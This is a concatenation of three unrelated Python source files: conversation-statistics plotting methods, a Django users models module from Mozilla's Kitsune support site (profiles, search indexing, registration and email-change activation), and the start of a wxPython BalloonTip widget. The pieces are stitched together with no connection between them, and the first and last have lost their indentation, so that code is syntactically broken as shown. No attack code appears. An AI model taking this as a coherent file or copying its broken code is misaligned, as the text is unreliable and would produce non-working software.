def plot_word_count_by_time(self, time_interval, word, bar_chart=True):
time_interval_to_word_count = self.get_time_interval_to_word_count(time_interval, word)
y_label = 'Count of the Word \'{}\''.format(word)
self.plot_message_statistic_by_time(time_interval_to_word_count,
time_interval, y_label,
bar_chart=bar_chart)
def plot_message_statistic_by_user(self, user_to_message_statistic, y_label):
x_label = 'User'
title = y_label + ' by ' + x_label
plot.plot_bar_chart(user_to_message_statistic, title, x_label, y_label)
def plot_n_messages_by_user(self):
user_to_n_messages = self.get_user_to_n_messages()
y_label = 'Number of Messages'
self.plot_message_statistic_by_user(user_to_n_messages, y_label)
def plot_damped_n_messages_by_user(self, dt_max, alpha):
user_to_damped_n_messages = self.get_user_to_damped_n_messages(dt_max, alpha)
y_label = 'Damped Number of Messages (alpha = {})'.format(alpha)
self.plot_message_statistic_by_user(user_to_damped_n_messages, y_label)
def plot_word_count_by_user(self, word):
user_to_word_count = self.get_user_to_word_count(word)
y_label = 'Count of the Word \'{}\''.format(word)
self.plot_message_statistic_by_user(user_to_word_count, y_label)
def plot_initiated_messages_by_user(self, minute_cutoff):
user_to_n_initiated_messages = self.get_user_to_n_initiated_messages(minute_cutoff)
title = 'Number of Initiated Messages by User with minute_cutoff = {}'.format(minute_cutoff)
x_label = 'User'
y_label = 'Number of Initiated Messages'
plot.plot_bar_chart(user_to_n_initiated_messages, title, x_label, y_label)
def plot_end_messages_by_user(self, minute_cutoff):
user_to_n_end_messages = self.get_user_to_n_end_messages(minute_cutoff)
title = 'Number of End Messages by User with minute_cutoff = {}'.format(minute_cutoff)
x_label = 'User'
y_label = 'Number of End Messages'
plot.plot_bar_chart(user_to_n_end_messages, title, x_label, y_label)
def plot_proportion_initiated_by_minute_cutoff(self, cutoff_min, cutoff_max):
(x, user_to_proportion_initiated) = self.get_user_to_proportion_initiated(cutoff_min, cutoff_max)
title = 'Proportion of Initiated Messages by minute_cutoff'
x_label = 'minute_cutoff'
y_label = 'Proportion of Initiated Messages'
plot.plot_line_graph_multiple_lines(x, user_to_proportion_initiated, title, x_label, y_label)
def plot_proportion_end_by_minute_cutoff(self, cutoff_min, cutoff_max):
(x, user_to_proportion_end) = self.get_user_to_proportion_end(cutoff_min, cutoff_max)
title = 'Proportion of End Messages by minute_cutoff'
x_label = 'minute_cutoff'
y_label = 'Proportion of End Messages'
plot.plot_line_graph_multiple_lines(x, user_to_proportion_end, title, x_label, y_label)
def plot_damped_n_messages_by_alpha(self, dt_max, alpha_min, alpha_max, n_alphas=100):
"""
looks like exponential decay because dominated by most recent message
"""
alpha_to_damped_n_messages = self.get_alpha_to_damped_n_messages(dt_max, alpha_min, alpha_max, n_alphas)
y_label = 'Damped Number of Messages'
x_label = 'Alpha'
title = y_label + ' by ' + x_label
plot.plot_line_graph(alpha_to_damped_n_messages, title, x_label, y_label)
def plot_eigenvector_centrality_by_user(self, G):
user_to_eigenvector_centrality = self.get_user_to_eigenvector_centrality(G)
y_label = 'Eigenvector Centrality'
self.plot_message_statistic_by_user(user_to_eigenvector_centrality, y_label)
if __name__ == '__main__':
    from message import Message

    # Small hand-built conversation for ad-hoc manual testing.
    messages = [
        Message('Alice', datetime(2013, 11, 20, 1, 1), 'text1'),
        Message('Alice', datetime(2015, 1, 20, 1, 1), 'text2'),
        Message('Bob', datetime(2015, 1, 20, 1, 10), 'text3 a'),
        Message('Bob', datetime(2015, 1, 20, 1, 10), 'text4 a Joe a'),
        Message('Alice', datetime(2015, 1, 21, 3, 59), 'text5 @joE'),
        Message('Bob', datetime(2015, 1, 21, 4, 2), 'text6 a'),
        Message('Joe', datetime(2015, 2, 24, 0, 2), 'atext7 a @Bobbob @Bob boB'),
    ]
    c = Conversation(messages, ['Alice', 'Bob', 'Charles'])
    d1 = c.get_user_to_n_messages()
    a = datetime(2017, 1, 1, 1, 1)
    b = datetime(2017, 1, 2, 1, 1)
    dt_max = datetime(2015, 1, 28, 23, 59)
    # Examples of plotting calls, left disabled:
    # c.plot_proportion_initiated_by_minute_cutoff(0, 30)
    # c.plot_n_messages_by_time('minute in day', bar_chart=False)
| |
import hashlib
import logging
import random
import re
import time
from datetime import datetime, timedelta
from django.conf import settings
from django.contrib.auth.models import User, Group
from django.contrib.sites.models import Site
from django.db import models
from celery.task import task
from statsd import statsd
from timezones.fields import TimeZoneField
from tower import ugettext as _
from tower import ugettext_lazy as _lazy
from kitsune.lib.countries import COUNTRIES
from kitsune.search.es_utils import UnindexMeBro
from kitsune.search.models import (
SearchMappingType, SearchMixin, register_for_indexing,
register_mapping_type)
from kitsune.sumo import email_utils
from kitsune.sumo.models import ModelBase, LocaleField
from kitsune.sumo.urlresolvers import reverse
from kitsune.sumo.utils import auto_delete_files, chunked
from kitsune.users.validators import TwitterValidator
# Module-level logger for the users app.
log = logging.getLogger('k.users')

# Activation keys are SHA1 hex digests: exactly 40 lowercase hex chars
# (see ConfirmationManager.create_profile).
SHA1_RE = re.compile('^[a-f0-9]{40}$')

# Name of the auth Group a user joins when registering as a contributor.
CONTRIBUTOR_GROUP = 'Registered as contributor'
@auto_delete_files
class Profile(ModelBase, SearchMixin):
    """Profile model for django users."""

    # One profile per django ``User``; the User's pk is reused as this pk.
    user = models.OneToOneField(User, primary_key=True,
                                verbose_name=_lazy(u'User'))
    name = models.CharField(max_length=255, null=True, blank=True,
                            verbose_name=_lazy(u'Display name'))
    public_email = models.BooleanField(  # show/hide email
        default=False, verbose_name=_lazy(u'Make my email public'))
    avatar = models.ImageField(upload_to=settings.USER_AVATAR_PATH, null=True,
                               blank=True, verbose_name=_lazy(u'Avatar'),
                               max_length=settings.MAX_FILEPATH_LENGTH)
    bio = models.TextField(null=True, blank=True,
                           verbose_name=_lazy(u'Biography'))
    website = models.URLField(max_length=255, null=True, blank=True,
                              verbose_name=_lazy(u'Website'))
    twitter = models.CharField(max_length=15, null=True, blank=True, validators=[TwitterValidator],
                               verbose_name=_lazy(u'Twitter Username'))
    facebook = models.URLField(max_length=255, null=True, blank=True,
                               verbose_name=_lazy(u'Facebook URL'))
    mozillians = models.CharField(max_length=255, null=True, blank=True,
                                  verbose_name=_lazy(u'Mozillians Username'))
    irc_handle = models.CharField(max_length=255, null=True, blank=True,
                                  verbose_name=_lazy(u'IRC nickname'))
    timezone = TimeZoneField(null=True, blank=True,
                             verbose_name=_lazy(u'Timezone'))
    country = models.CharField(max_length=2, choices=COUNTRIES, null=True,
                               blank=True, verbose_name=_lazy(u'Country'))
    # No city validation
    city = models.CharField(max_length=255, null=True, blank=True,
                            verbose_name=_lazy(u'City'))
    locale = LocaleField(default=settings.LANGUAGE_CODE,
                         verbose_name=_lazy(u'Preferred language'))
    # One-shot flags so "first contribution" emails are only sent once.
    first_answer_email_sent = models.BooleanField(
        default=False, help_text=_lazy(u'Has been sent a first answer contribution email.'))
    first_l10n_email_sent = models.BooleanField(
        default=False, help_text=_lazy(u'Has been sent a first revision contribution email.'))
    involved_from = models.DateField(null=True, blank=True,
                                     verbose_name=_lazy(u'Involved with Mozilla from'))

    class Meta(object):
        permissions = (('view_karma_points', 'Can view karma points'),
                       ('deactivate_users', 'Can deactivate users'),
                       ('screen_share', 'Can screen share'),)

    def __unicode__(self):
        # Never let repr of a profile raise (e.g. in admin lists); fall back
        # to the pk plus the exception.
        try:
            return unicode(self.user)
        except Exception as exc:
            return unicode('%d (%r)' % (self.pk, exc))

    def get_absolute_url(self):
        return reverse('users.profile', args=[self.user_id])

    def clear(self):
        """Clears out the users profile"""
        # NOTE(review): locale/country/timezone are intentionally (?) left
        # untouched here -- confirm before relying on a full wipe.
        self.name = ''
        self.public_email = False
        self.avatar = None
        self.bio = ''
        self.website = ''
        self.twitter = ''
        self.facebook = ''
        self.mozillians = ''
        self.irc_handle = ''
        self.city = ''

    @property
    def display_name(self):
        # Prefer the chosen display name; fall back to the login username.
        return self.name if self.name else self.user.username

    @property
    def twitter_usernames(self):
        # Distinct twitter handles this user has replied from.
        from kitsune.customercare.models import Reply
        return list(
            Reply.objects.filter(user=self.user)
            .values_list('twitter_username', flat=True)
            .distinct())

    @classmethod
    def get_mapping_type(cls):
        return UserMappingType

    @classmethod
    def get_serializer(cls, serializer_type='full'):
        """Return the DRF serializer class: 'full' or 'fk' (foreign-key)."""
        # Avoid circular import
        from kitsune.users import api
        if serializer_type == 'full':
            return api.ProfileSerializer
        elif serializer_type == 'fk':
            return api.ProfileFKSerializer
        else:
            raise ValueError('Unknown serializer type "{}".'.format(serializer_type))

    @property
    def last_contribution_date(self):
        """Get the date of the user's last contribution."""
        from kitsune.customercare.models import Reply
        from kitsune.questions.models import Answer
        from kitsune.wiki.models import Revision

        dates = []
        # Latest Army of Awesome reply:
        try:
            aoa_reply = Reply.objects.filter(
                user=self.user).latest('created')
            dates.append(aoa_reply.created)
        except Reply.DoesNotExist:
            pass
        # Latest Support Forum answer:
        try:
            answer = Answer.objects.filter(
                creator=self.user).latest('created')
            dates.append(answer.created)
        except Answer.DoesNotExist:
            pass
        # Latest KB Revision edited:
        try:
            revision = Revision.objects.filter(
                creator=self.user).latest('created')
            dates.append(revision.created)
        except Revision.DoesNotExist:
            pass
        # Latest KB Revision reviewed:
        try:
            revision = Revision.objects.filter(
                reviewer=self.user).latest('reviewed')
            # Old revisions don't have the reviewed date.
            dates.append(revision.reviewed or revision.created)
        except Revision.DoesNotExist:
            pass

        # None means the user has never contributed in any of the four ways.
        if len(dates) == 0:
            return None
        return max(dates)

    @property
    def settings(self):
        # Reverse FK defined by Setting.user related_name='settings'.
        return self.user.settings

    @property
    def answer_helpfulness(self):
        # Avoid circular import
        from kitsune.questions.models import AnswerVote
        return AnswerVote.objects.filter(answer__creator=self.user, helpful=True).count()
@register_mapping_type
class UserMappingType(SearchMappingType):
    """Elasticsearch mapping type for indexing user Profiles."""

    # Document fields that hold lists of values rather than scalars.
    list_keys = [
        'twitter_usernames',
        'itwitter_usernames',
    ]

    @classmethod
    def get_model(cls):
        return Profile

    @classmethod
    def get_index_group(cls):
        return 'non-critical'

    @classmethod
    def get_mapping(cls):
        """Return the Elasticsearch field mapping for user documents."""
        return {
            'properties': {
                'id': {'type': 'long'},
                'model': {'type': 'string', 'index': 'not_analyzed'},
                'url': {'type': 'string', 'index': 'not_analyzed'},
                'indexed_on': {'type': 'integer'},
                'username': {'type': 'string', 'index': 'not_analyzed'},
                'display_name': {'type': 'string', 'index': 'not_analyzed'},
                'twitter_usernames': {
                    'type': 'string',
                    'index': 'not_analyzed'
                },
                'last_contribution_date': {'type': 'date'},
                # lower-cased versions for querying:
                'iusername': {'type': 'string', 'index': 'not_analyzed'},
                'idisplay_name': {'type': 'string', 'analyzer': 'whitespace'},
                'itwitter_usernames': {
                    'type': 'string',
                    'index': 'not_analyzed'
                },
                'avatar': {'type': 'string', 'index': 'not_analyzed'},
                # Completion suggester field fed by extract_document below.
                'suggest': {
                    'type': 'completion',
                    'index_analyzer': 'whitespace',
                    'search_analyzer': 'whitespace',
                    'payloads': True,
                }
            }
        }

    @classmethod
    def extract_document(cls, obj_id, obj=None):
        """Build the search document dict for one Profile.

        Raises UnindexMeBro for inactive users so they get dropped
        from the index.
        """
        if obj is None:
            model = cls.get_model()
            obj = model.objects.select_related('user').get(pk=obj_id)
        if not obj.user.is_active:
            raise UnindexMeBro()
        d = {}
        d['id'] = obj.pk
        d['model'] = cls.get_mapping_type_name()
        d['url'] = obj.get_absolute_url()
        d['indexed_on'] = int(time.time())
        d['username'] = obj.user.username
        d['display_name'] = obj.display_name
        d['twitter_usernames'] = obj.twitter_usernames
        d['last_contribution_date'] = obj.last_contribution_date
        # Lower-cased copies for case-insensitive querying.
        d['iusername'] = obj.user.username.lower()
        d['idisplay_name'] = obj.display_name.lower()
        d['itwitter_usernames'] = [u.lower() for u in obj.twitter_usernames]
        from kitsune.users.helpers import profile_avatar
        d['avatar'] = profile_avatar(obj.user, size=120)
        # Suggester input/output/payload used by suggest_completions().
        d['suggest'] = {
            'input': [
                d['iusername'],
                d['idisplay_name']
            ],
            'output': _(u'{displayname} ({username})').format(
                displayname=d['display_name'], username=d['username']),
            'payload': {'user_id': d['id']},
        }
        return d

    @classmethod
    def suggest_completions(cls, text):
        """Suggest completions for the text provided."""
        USER_SUGGEST = 'user-suggest'
        es = UserMappingType.search().get_es()
        results = es.suggest(index=cls.get_index(), body={
            USER_SUGGEST: {
                'text': text.lower(),
                'completion': {
                    'field': 'suggest'
                }
            }
        })
        # Return the raw option list, or [] when nothing matched.
        if results[USER_SUGGEST][0]['length'] > 0:
            return results[USER_SUGGEST][0]['options']
        return []
# Reindex the profile whenever a Profile is saved or deleted.
register_for_indexing('users', Profile)


def get_profile(u):
    """Return the Profile for user `u`, or None if it doesn't exist."""
    try:
        return Profile.objects.get(user=u)
    except Profile.DoesNotExist:
        return None

# Also reindex the related profile whenever the User itself changes.
register_for_indexing(
    'users',
    User,
    instance_to_indexee=get_profile)
class Setting(ModelBase):
    """User specific value per setting"""
    user = models.ForeignKey(User, verbose_name=_lazy(u'User'),
                             related_name='settings')
    name = models.CharField(max_length=100)
    value = models.CharField(blank=True, max_length=60,
                             verbose_name=_lazy(u'Value'))

    class Meta(object):
        # A user may have at most one row per setting name.
        unique_together = (('user', 'name'),)

    def __unicode__(self):
        return u'%s %s:%s' % (self.user, self.name, self.value or u'[none]')

    @classmethod
    def get_for_user(cls, user, name):
        """Return `user`'s value for setting `name`, creating the row with
        the form-field default on first access.

        Raises KeyError when `name` is not a known SettingsForm field.
        The value is cast via the form field's `to_python`.
        """
        from kitsune.users.forms import SettingsForm
        form = SettingsForm()
        # Membership test directly on the fields dict (no .keys() needed).
        if name not in form.fields:
            # Fixed: message previously said "SettingsFrom".
            raise KeyError(("'{name}' is not a field in "
                            "user.forms.SettingsForm()").format(name=name))
        try:
            setting = Setting.objects.get(user=user, name=name)
        except Setting.DoesNotExist:
            value = form.fields[name].initial or ''
            setting = Setting.objects.create(user=user, name=name, value=value)
        # Cast to the field's Python type.
        return form.fields[name].to_python(setting.value)
# Activation model and manager:
# (based on http://bitbucket.org/ubernostrum/django-registration)
class ConfirmationManager(models.Manager):
    """
    Custom manager for confirming keys sent by email.

    The methods defined here provide shortcuts for creation of instances
    and sending email confirmations.
    Activation should be done in specific managers.
    """
    def _send_email(self, confirmation_profile, url,
                    subject, text_template, html_template,
                    send_to, **kwargs):
        """
        Send an email using a passed in confirmation profile.

        Use specified url, subject, text_template, html_template and
        email to send_to. Extra **kwargs become template context vars.
        """
        current_site = Site.objects.get_current()
        email_kwargs = {'activation_key': confirmation_profile.activation_key,
                        'domain': current_site.domain,
                        'activate_url': url,
                        'login_url': reverse('users.login'),
                        'reg': 'main'}
        email_kwargs.update(kwargs)

        # RegistrationProfile doesn't have a locale attribute. So if
        # we get one of those, then we have to get the real profile
        # from the user.
        if hasattr(confirmation_profile, 'locale'):
            locale = confirmation_profile.locale
        else:
            locale = confirmation_profile.user.profile.locale

        # safe_translation renders the mail in `locale`, falling back if the
        # translation is broken.
        @email_utils.safe_translation
        def _make_mail(locale):
            mail = email_utils.make_mail(
                subject=subject,
                text_template=text_template,
                html_template=html_template,
                context_vars=email_kwargs,
                from_email=settings.DEFAULT_FROM_EMAIL,
                to_email=send_to)
            return mail

        email_utils.send_messages([_make_mail(locale)])

    def send_confirmation_email(self, *args, **kwargs):
        """This is meant to be overwritten."""
        raise NotImplementedError

    def create_profile(self, user, *args, **kwargs):
        """
        Create an instance of this manager's object class for a given
        ``User``, and return it.

        The activation key will be a SHA1 hash, generated from a combination
        of the ``User``'s username and a random salt.
        """
        # NOTE(review): `random.random()` is not a CSPRNG; consider
        # `os.urandom`/`secrets` for generating activation-key salts.
        salt = hashlib.sha1(str(random.random())).hexdigest()[:5]
        activation_key = hashlib.sha1(salt + user.username).hexdigest()
        return self.create(user=user, activation_key=activation_key, **kwargs)
class RegistrationManager(ConfirmationManager):
    """Manager that creates inactive users and activates them by key."""

    def get_user(self, activation_key):
        """Get the user for the specified activation_key."""
        try:
            profile = self.get(activation_key=activation_key)
            return profile.user
        except self.model.DoesNotExist:
            return None

    def activate_user(self, activation_key, request=None):
        """
        Validate an activation key and activate the corresponding
        ``User`` if valid.

        If the key is valid and has not expired, return the ``User``
        after activating.
        If the key is not valid or has expired, return ``False``.

        NOTE(review): `request` is accepted but never used here --
        confirm whether callers still need to pass it.
        """
        # Make sure the key we're trying conforms to the pattern of a
        # SHA1 hash; if it doesn't, no point trying to look it up in
        # the database.
        if SHA1_RE.search(activation_key):
            try:
                profile = self.get(activation_key=activation_key)
            except self.model.DoesNotExist:
                profile = None
                statsd.incr('user.activate-error.does-not-exist')
                reason = 'key not found'
            if profile:
                if not profile.activation_key_expired():
                    user = profile.user
                    user.is_active = True
                    user.save()
                    # We don't need the RegistrationProfile anymore, delete it.
                    # (The in-memory instance is still used below for the
                    # welcome email's activation_key context.)
                    profile.delete()
                    # If user registered as contributor, send them the
                    # welcome email.
                    if user.groups.filter(name=CONTRIBUTOR_GROUP):
                        self._send_email(
                            confirmation_profile=profile,
                            url=None,
                            subject=_('Welcome to SUMO!'),
                            text_template='users/email/contributor.ltxt',
                            html_template='users/email/contributor.html',
                            send_to=user.email,
                            contributor=user)
                    return user
                else:
                    statsd.incr('user.activate-error.expired')
                    reason = 'key expired'
        else:
            statsd.incr('user.activate-error.invalid-key')
            reason = 'invalid key'
        # Every failure path funnels here with a reason for the log.
        log.warning(u'User activation failure ({r}): {k}'.format(
            r=reason, k=activation_key))
        return False

    def create_inactive_user(self, username, password, email,
                             locale=settings.LANGUAGE_CODE,
                             text_template=None, html_template=None,
                             subject=None, email_data=None,
                             volunteer_interest=False, **kwargs):
        """
        Create a new, inactive ``User`` and ``Profile``, generates a
        ``RegistrationProfile`` and email its activation key to the
        ``User``, returning the new ``User``.
        """
        new_user = User.objects.create_user(username, email, password)
        new_user.is_active = False
        new_user.save()
        Profile.objects.create(user=new_user, locale=locale)

        registration_profile = self.create_profile(new_user)

        self.send_confirmation_email(
            registration_profile,
            text_template,
            html_template,
            subject,
            email_data,
            **kwargs)

        # Contributors also join the contributor group immediately.
        if volunteer_interest:
            statsd.incr('user.registered-as-contributor')
            group = Group.objects.get(name=CONTRIBUTOR_GROUP)
            new_user.groups.add(group)

        return new_user

    def send_confirmation_email(self, registration_profile,
                                text_template=None, html_template=None,
                                subject=None, email_data=None, **kwargs):
        """Send the user confirmation email."""
        user_id = registration_profile.user.id
        key = registration_profile.activation_key
        self._send_email(
            confirmation_profile=registration_profile,
            url=reverse('users.activate', args=[user_id, key]),
            subject=subject or _('Please confirm your email address'),
            text_template=text_template or 'users/email/activate.ltxt',
            html_template=html_template or 'users/email/activate.html',
            send_to=registration_profile.user.email,
            expiration_days=settings.ACCOUNT_ACTIVATION_DAYS,
            username=registration_profile.user.username,
            email_data=email_data,
            **kwargs)

    def delete_expired_users(self):
        """
        Remove expired instances of this manager's object class.

        Accounts to be deleted are identified by searching for
        instances of this manager's object class with expired activation
        keys, and then checking to see if their associated ``User``
        instances have the field ``is_active`` set to ``False``; any
        ``User`` who is both inactive and has an expired activation
        key will be deleted.
        """
        days_valid = settings.ACCOUNT_ACTIVATION_DAYS
        expired = datetime.now() - timedelta(days=days_valid)
        prof_ids = self.filter(user__date_joined__lt=expired)
        prof_ids = prof_ids.values_list('id', flat=True)
        # Fan the deletions out to celery in chunks of 1000 ids.
        for chunk in chunked(prof_ids, 1000):
            _delete_registration_profiles_chunk.apply_async(args=[chunk])
@task
def _delete_registration_profiles_chunk(data):
    """Delete the RegistrationProfiles whose ids are in `data`, along with
    any of their users that are still inactive."""
    log_msg = u'Deleting {num} expired registration profiles.'
    log.info(log_msg.format(num=len(data)))
    profiles = RegistrationProfile.objects.filter(id__in=data)
    for reg_profile in profiles.select_related('user'):
        owner = reg_profile.user
        reg_profile.delete()
        if owner and not owner.is_active:
            owner.delete()
class EmailChangeManager(ConfirmationManager):
    def send_confirmation_email(self, email_change, new_email):
        """Ask for confirmation before changing a user's email."""
        confirm_url = reverse('users.confirm_email',
                              args=[email_change.activation_key])
        self._send_email(
            confirmation_profile=email_change,
            url=confirm_url,
            subject=_('Please confirm your email address'),
            text_template='users/email/confirm_email.ltxt',
            html_template='users/email/confirm_email.html',
            send_to=new_email)
class RegistrationProfile(models.Model):
    """
    A simple profile which stores an activation key used for
    user account registration.

    Generally, you will not want to interact directly with instances
    of this model; the provided manager includes methods
    for creating and activating new accounts.
    """
    user = models.ForeignKey(User, unique=True, verbose_name=_lazy(u'user'))
    # 40-char SHA1 hex digest (see ConfirmationManager.create_profile).
    activation_key = models.CharField(verbose_name=_lazy(u'activation key'),
                                      max_length=40)

    objects = RegistrationManager()

    class Meta:
        verbose_name = _lazy(u'registration profile')
        verbose_name_plural = _lazy(u'registration profiles')

    def __unicode__(self):
        return u'Registration information for %s' % self.user

    def activation_key_expired(self):
        """
        Determine whether this ``RegistrationProfile``'s activation
        key has expired, returning a boolean -- ``True`` if the key
        has expired.

        Key expiration is determined by:
        1. The date the user signed up is incremented by
           the number of days specified in the setting
           ``ACCOUNT_ACTIVATION_DAYS`` (which should be the number of
           days after signup during which a user is allowed to
           activate their account); if the result is less than or
           equal to the current date, the key has expired and this
           method returns ``True``.
        """
        exp_date = timedelta(days=settings.ACCOUNT_ACTIVATION_DAYS)
        return self.user.date_joined + exp_date <= datetime.now()
    # Render as a boolean icon in the Django admin changelist.
    activation_key_expired.boolean = True
class EmailChange(models.Model):
    """Stores email with activation key when user requests a change."""
    # Sentinel value -- presumably stored once the change has been
    # applied; verify against the confirm_email view before relying on it.
    ACTIVATED = u"ALREADY_ACTIVATED"
    user = models.ForeignKey(User, unique=True, verbose_name=_lazy(u'user'))
    activation_key = models.CharField(verbose_name=_lazy(u'activation key'),
                                      max_length=40)
    # The requested new address.
    email = models.EmailField(db_index=True, null=True)

    objects = EmailChangeManager()

    def __unicode__(self):
        return u'Change email request to %s for %s' % (self.email, self.user)
class Deactivation(models.Model):
    """Stores user deactivation logs."""
    # The account that was deactivated ('+' disables the reverse relation).
    user = models.ForeignKey(User, verbose_name=_lazy(u'user'),
                             related_name='+')
    # The user who performed the deactivation.
    moderator = models.ForeignKey(User, verbose_name=_lazy(u'moderator'),
                                  related_name='deactivations')
    date = models.DateTimeField(default=datetime.now)

    def __unicode__(self):
        return u'%s was deactivated by %s on %s' % (self.user, self.moderator,
                                                    self.date)
| |
# --------------------------------------------------------------------------- #
# BALLOONTIP wxPython IMPLEMENTATION
# Python Code By:
#
# Andrea Gavana, @ 29 May 2005
# Latest Revision: 23 Nov 2009, 09.00 GMT
#
#
# TODO List/Caveats
#
# 1. With wx.ListBox (And Probably Other Controls), The BalloonTip Sometimes
# Flashes (It Is Created And Suddenly Destroyed). I Don't Know What Is
# Happening. Probably I Don't Handle Correctly The wx.EVT_ENTER_WINDOW
# wx.EVT_LEAVE_WINDOW?
#
# 2. wx.RadioBox Seems Not To Receive The wx.EVT_ENTER_WINDOW Event
#
# 3. wx.SpinCtrl (And Probably Other Controls), When Put In A Sizer, Does Not
# Return The Correct Size/Position. Probably Is Something I Am Missing.
#
# 4. Other Issues?
#
#
# FIXED Problems
#
# 1. Now BalloonTip Control Works Also For TaskBarIcon (Thanks To Everyone
# For The Suggestions I Read In The wxPython Mailing List)
#
#
# For All Kind Of Problems, Requests Of Enhancements And Bug Reports, Please
# Write To Me At:
#
# andrea.gavana@gmail.com
# gavana@kpo.kz
#
# Or, Obviously, To The wxPython Mailing List!!!
#
#
# End Of Comments
# --------------------------------------------------------------------------- #
"""
BalloonTip is a class that allows you to display tooltips in a balloon style
window.
Description
===========
BalloonTip is a class that allows you to display tooltips in a balloon style
window (actually a frame), similarly to the windows XP balloon help. There is
also an arrow that points to the center of the control designed as a "target"
for the BalloonTip.
What it can do:
- Set the balloon shape as a rectangle or a rounded rectangle;
- Set an icon to the top-left of the BalloonTip frame;
- Set a title at the top of the BalloonTip frame;
- Automatic "best" placement of BalloonTip frame depending on the target
control/window position;
- Runtime customization of title/tip fonts and foreground colours;
- Runtime change of BalloonTip frame shape;
- Set the balloon background colour;
- Possibility to set the delay after which the BalloonTip is displayed;
- Possibility to set the delay after which the BalloonTip is destroyed;
- Three different behaviors for the BalloonTip window (regardless the delay
destruction time set):
a) Destroy by leave: the BalloonTip is destroyed when the mouse leaves the
target control/window;
b) Destroy by click: the BalloonTip is destroyed when you click on any area
of the target control/window;
c) Destroy by button: the BalloonTip is destroyed when you click on the
top-right close button;
- Possibility to enable/disable globally the BalloonTip on your application;
- Set the BalloonTip also for the taskbar icon.
Usage
=====
Usage example::
# let's suppose that in your application you have a wx.TextCtrl defined as:
mytextctrl = wx.TextCtrl(panel, -1, "i am a textctrl")
# you can define your BalloonTip as follows:
tipballoon = BalloonTip(topicon=None, toptitle="textctrl",
message="this is a textctrl",
shape=BT_ROUNDED,
tipstyle=BT_LEAVE)
# set the BalloonTip target
tipballoon.SetTarget(mytextctrl)
# set the BalloonTip background colour
tipballoon.SetBalloonColour(wx.white)
# set the font for the balloon title
tipballoon.SetTitleFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
# set the colour for the balloon title
tipballoon.SetTitleColour(wx.BLACK)
# leave the message font as default
tipballoon.SetMessageFont()
# set the message (tip) foreground colour
tipballoon.SetMessageColour(wx.LIGHT_GREY)
# set the start delay for the BalloonTip
tipballoon.SetStartDelay(1000)
# set the time after which the BalloonTip is destroyed
tipballoon.SetEndDelay(3000)
Window Styles
=============
This class supports the following window styles:
================ =========== ==================================================
Window Styles Hex Value Description
================ =========== ==================================================
``BT_ROUNDED`` 0x1 `BalloonTip` will have a rounded rectangular shape.
``BT_RECTANGLE`` 0x2 `BalloonTip` will have a rectangular shape.
``BT_LEAVE`` 0x3 `BalloonTip` will be destroyed when the user moves the mouse outside the target window.
``BT_CLICK`` 0x4 `BalloonTip` will be destroyed when the user click on `BalloonTip`.
``BT_BUTTON`` 0x5 `BalloonTip` will be destroyed when the user click on the close button.
================ =========== ==================================================
Events Processing
=================
`No custom events are available for this class.`
License And Version
===================
BalloonTip is distributed under the wxPython license.
Latest revision: Andrea Gavana @ 23 Nov 2009, 09.00 GMT
Version 0.2
"""
import wx
import time
from wx.lib.buttons import GenButton
# Shape and tip-style constants; values are distinct ints compared with ==
# in BalloonFrame/BalloonTip.

# Define The Values For The BalloonTip Frame Shape
BT_ROUNDED = 1
""" `BalloonTip` will have a rounded rectangular shape. """
BT_RECTANGLE = 2
""" `BalloonTip` will have a rectangular shape. """

# Define The Value For The BalloonTip Destruction Behavior
BT_LEAVE = 3
""" `BalloonTip` will be destroyed when the user moves the mouse outside the target window. """
BT_CLICK = 4
""" `BalloonTip` will be destroyed when the user click on `BalloonTip`. """
BT_BUTTON = 5
""" `BalloonTip` will be destroyed when the user click on the close button. """
# ---------------------------------------------------------------
# Class BalloonFrame
# ---------------------------------------------------------------
# This Class Is Called By The Main BalloonTip Class, And It Is
# Responsible For The Frame Creation/Positioning On Screen
# Depending On Target Control/Window, The Frame Can Position
# Itself To NW (Default), NE, SW, SE. The Switch On Positioning
# Is Done By Calculating The Absolute Position Of The Target
# Control/Window Plus/Minus The BalloonTip Size. The Pointing
# Arrow Is Positioned Accordingly.
# ---------------------------------------------------------------
class BalloonFrame(wx.Frame):
"""
This class is called by the main L{BalloonTip} class, and it is
responsible for the frame creation/positioning on screen
depending on target control/window, the frame can position
itself to NW (default), NE, SW, SE. The switch on positioning
is done by calculating the absolute position of the target
control/window plus/minus the balloontip size. The pointing
arrow is positioned accordingly.
"""
    def __init__(self, parent, id=wx.ID_ANY, pos=wx.DefaultPosition,
                 size=wx.DefaultSize, classparent=None):
        """
        Default class constructor.

        Used internally. Do not call directly this class in your application!

        :param `classparent`: the owning `BalloonTip`, whose appearance
         settings are copied onto this frame.
        """
        # The frame is created with no wx parent (None) and STAY_ON_TOP so it
        # floats above all windows; `parent`/`id` are kept for signature
        # compatibility only.
        wx.Frame.__init__(self, None, -1, "BalloonTip", pos, size,
                          style=wx.FRAME_SHAPED |
                          wx.SIMPLE_BORDER |
                          wx.FRAME_NO_TASKBAR |
                          wx.STAY_ON_TOP)
        self._parent = classparent
        # Mirror the owning BalloonTip's settings locally.
        self._toptitle = self._parent._toptitle
        self._topicon = self._parent._topicon
        self._message = self._parent._message
        self._shape = self._parent._shape
        self._tipstyle = self._parent._tipstyle
        self._ballooncolour = self._parent._ballooncolour
        self._balloonmsgcolour = self._parent._balloonmsgcolour
        self._balloonmsgfont = self._parent._balloonmsgfont
        # Title colour/font only exist on the parent when a title was set.
        if self._toptitle != "":
            self._balloontitlecolour = self._parent._balloontitlecolour
            self._balloontitlefont = self._parent._balloontitlefont
        panel = wx.Panel(self, -1)
        sizer = wx.BoxSizer(wx.VERTICAL)
        self.panel = panel
        subsizer = wx.BoxSizer(wx.VERTICAL)
        hsizer = wx.BoxSizer(wx.HORIZONTAL)
        # 20px top spacer (SetBalloonShape draws the pointing arrow in that
        # band).
        subsizer.Add((0,20), 0, wx.EXPAND)
        # Optional top-left icon.
        if self._topicon is not None:
            stb = wx.StaticBitmap(panel, -1, self._topicon)
            hsizer.Add(stb, 0, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.TOP, 10)
            self._balloonbmp = stb
        # Optional bold title row.
        if self._toptitle != "":
            stt = wx.StaticText(panel, -1, self._toptitle)
            stt.SetFont(wx.Font(9, wx.SWISS, wx.NORMAL, wx.BOLD, False))
            if self._topicon is None:
                hsizer.Add((10,0), 0, wx.EXPAND)
            hsizer.Add(stt, 1, wx.EXPAND | wx.TOP, 10)
            self._balloontitle = stt
            self._balloontitle.SetForegroundColour(self._balloontitlecolour)
            self._balloontitle.SetFont(self._balloontitlefont)
